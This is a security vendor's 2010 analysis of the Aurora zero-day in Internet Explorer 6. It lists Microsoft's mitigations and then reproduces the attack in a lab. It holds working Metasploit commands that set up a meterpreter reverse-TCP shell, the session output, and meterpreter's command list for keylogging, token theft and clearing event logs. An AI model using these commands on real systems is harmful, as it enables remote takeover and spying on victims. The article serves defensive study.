Store
|
Contatti Norman
|
Informazioni su Norman
|
Selezionare il paese
Corporate
Norge
France
Deutschland
Sverige
Danmark
Suomi
Nederland
Schweiz
España
United States
United Kingdom
Italia
Sicurezza IT proattiva
Utenza domestica Aziende di piccole / medie dimensioni Imprese La tecnologia Norman Centro di sicurezza Norman come partner aziendale Supporto   Web Partner
Home
>
Centro di sicurezza
>
Articoli sulla sicurezza - archivio
>
2010
>
Aurora Attack - Zero day exploit in IE6
Norman SandBox center
Inviare file per l'analisi SandBox [EN]
Ricercare nel database di analisi del malware [EN]
Visualizzare le analisi SandBox più recenti [EN]
Statistiche sui malware[EN]
Descrizione dei virus [EN]
Articoli sulla sicurezza - archivio
Tipi di malware [EN]
Livello di pericolosità [EN]
Minacce attuali di virus
Blog sulla sicurezza [EN]
Statistiche sulla posta elettronica [EN]
Testi, white paper generici ed altro

Aurora Attack - Zero day exploit in IE6

2010-02-04 [Exploit analysis]

Aurora attacks, which is known to be originated from china, is a major attack in the recent past which used an Internet explorer exploit code to attack companies like Google and Adobe and succeeded in stealing some intellectual properties.

According to Microsoft, The vulnerability exists as an invalid pointer reference within Internet Explorer. It is possible under certain conditions for the invalid pointer to be accessed after an object is deleted. In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution.

Vulnerability has been exploited on IE 6 till now and it can be exploited on IE 7 also, it’s not yet been done on IE 7 because of memory layout differences in IE 7.Exploit code has been published in the internet and can be used by anyone to craft similar attacks. Metasploit which is an open-source hacking tool has also released a working exploit of the attack which will be explained in detail in the last section.

Mitigation for this vulnerability according to the Microsoft is explained below:

  • Data Execution Protection (DEP) is enabled by default in Internet Explorer 8 on the following Windows operating systems: Windows XP Service Pack 3, Windows Vista Service Pack 1, Windows Vista Service Pack 2, and Windows 7.
  • Protected Mode in Internet Explorer on Windows Vista and later Windows operating systems limits the impact of the vulnerability.
  • In a Web-based attack scenario, an attacker could host a Web site that contains a Web Page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker’s Web site.
  • An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate with administrative user rights.
  • By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone.
  • By default, all supported versions of Microsoft Outlook, Microsoft Outlook Express, and Windows Mail open HTML e-mail messages in the restricted sites zone. The Restricted sites zone helps mitigate attacks that could try to exploit this vulnerability by preventing Active Scripting and ActiveX controls from being used when reading HTML e-mail messages. However, if a user clicks a link in an e-mail message, the user could still be vulnerable to exploitation of this vulnerability through the Web-based attack scenario.

Exploiting the Vulnerability:

We tried to reproduce the attack scenario using metasploit and were able to do it successfully. It was quite scary to see how the exploit works and how easy it is for a hacker to control the vulnerable system.

Software used for the attack and analysis:

  • Metasploit Framework
     
  • 2 networked VMware images running win XP with sp2.
     
  • Tcpview

We were able to setup metasploit in one VMware image to run as server to control the hacked system by issuing following commands:

msf > use exploit/windows/browser/ie_auroramsf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(ie_aurora) > set LHOST 192.168.1.30

LHOST => 192.168.1.30msf exploit(ie_aurora) > set LPORT 6666

LPORT => 6666msf exploit(ie_aurora) > set URIPATH /

URIPATH => /msf exploit(ie_aurora) > exploit

 

and this was the response which shows that the server was started

[*] Exploit running as background job.msf exploit(ie_aurora) >

[*] Started reverse handler on port 6666[*] Using URL: http://0.0.0.0:8080/

[*] Local IP: http://192.168.1.30:8080/[*] Server started.

 

We then opened Internet explorer in the vulnerable system(Other VMware running win XP with SP2) and entered the IP address(192.168.1.30 in our case) of the server in the browser and got the following response at the server end:

[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client 192.168.1.57[*] Sending stage (723456 bytes)

[*] Meterpreter session 1 opened (192.168.1.30:6666 -> 192.168.1.57:1038)

We then had to issue following command to start communicating with the exploited system:

sessions -i 1[*] Starting interaction with 1...

 

Examining the exploited system:

Checked the ports on the exploited system and found the backdoor which was opened by the exploit. Screenshot of the backdoor can be found below:

 

The port opened by the internet explorer can be seen in the fig 1.1 which will be used as backdoor in this scenario.

There are no other indications to find out that the computer has been hacked and can be controlled from a remote server.

Controlling the Exploited computer:

It’s really scary to see how a hacked computer can be controlled. An example of shell being controlled by the server can be seen below:

 

These are the following commands which can be used to control the hacked system including the command to take control of the shell.

Core Commands
=============

Command  Description
-------  -----------
Help menu
background  Backgrounds the current session
channel  Displays information about active channels
close  Closes a channel
exit  Terminate the meterpreter session
help  Help menu
interact  Interacts with a channel
irb  Drop into irb scripting mode
migrate  Migrate the server to another process
quit  Terminate the meterpreter session
read  Reads data from a channel
run  Executes a meterpreter script
use  Load a one or more meterpreter extensions
write  Writes data to a channel

 

Stdapi: File system Commands
============================

Command  Description
-------  -----------
cat  Read the contents of a file to the screen
cd  Change directory
del  Delete the specified file
download  Download a file or directory
edit  Edit a file
getlwd  Print local working directory
getwd  Print working directory
lcd  Change local working directory
lpwd  Print local working directory
ls  List files
mkdir  Make directory
pwd  Print working directory
rm  Delete the specified file
rmdir  Remove directory
upload  Upload a file or directory

 

 Stdapi: Networking Commands
===========================

Command  Description
-------  -----------
ipconfig  Display interfaces
portfwd  Forward a local port to a remote service
route  View and modify the routing table

 

Stdapi: System Commands
=======================

Command  Description
-------  -----------
clearev  Clear the event log
drop_token  Relinquishes any active impersonation token.
execute  Execute a command
getpid  Get the current process identifier
getprivs  Get as many privileges as possible
getuid  Get the user that the server is running as
kill  Terminate a process
ps  List running processes
reboot  Reboots the remote computer
reg  Modify and interact with the remote registry
rev2self  Calls RevertToSelf() on the remote machine
shell  Drop into a system command shell
shutdown  Shuts down the remote computer
steal_token  Attempts to steal an impersonation token from the target process
sysinfo  Gets information about the remote system, such as OS

 

Stdapi: User interface Commands
===============================

Command  Description
-------  -----------
enumdesktops  List all accessible desktops and window stations
idletime  Returns the number of seconds the remote user has been idle
keyscan_dump  Dump they keystroke buffer
keyscan_start  Start capturing keystrokes
keyscan_stop  Stop capturing keystrokes
setdesktop  Move to a different workstation and desktop
uictl  Control some of the user interface components

 

References

http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html
http://www.microsoft.com/technet/security/advisory/979352.mspx
 

Articoli sulla sicurezza correlati

Reflections on the PDF vulnerability [en]
Scary technique utilizing functionality in the PDF specification [en]
Use-after-free vulnerability in Adobe [en]
RSS FEEDS
Latest Security articles
Latest Blog items
Latest News
Latest Support issues
Current Virus treats
Privacy di Norman
|
Contratto di licenza [EN]
|
Marchi
|
Mappa del sito
FacebookTwitterYouTubeLinkedIn